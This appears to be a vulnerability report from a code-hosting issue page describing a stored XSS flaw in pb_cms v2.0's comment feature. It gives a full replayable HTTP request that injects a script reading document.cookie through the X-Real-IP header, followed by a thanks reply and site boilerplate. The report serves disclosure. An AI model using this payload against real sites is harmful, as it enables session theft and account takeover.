代码拉取完成,页面将自动刷新
Post comments on any articles on the front desk and grab bags


Add x-real-ip, replay
POST /blog/api/comment/save HTTP/1.1
Host: local:8899
Content-Length: 89
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.75 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://local:8899
Referer: http://local:8899/blog/article/1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
X-Real-IP: <script>alert(document.cookie)</script>
sid=1&nickname=qwe&qq=1231231231&email=123%40qq.com&content=%3Cp%3E123123%3C%2Fp%3E%0D%0A
Escalation of Privileges
#I4XWJ7:A stored XSS vulnerability in pb_cms v2.0 message board


@popko 感谢
此处可能存在不合适展示的内容,页面不予展示。您可通过相关编辑功能自查并修改。
如您确认内容无涉及 不当用语 / 纯广告导流 / 暴力 / 低俗色情 / 侵权 / 盗版 / 虚假 / 无价值内容或违法国家有关法律法规的内容,可点击提交进行申诉,我们将尽快为您处理。
登录 后才可以发表评论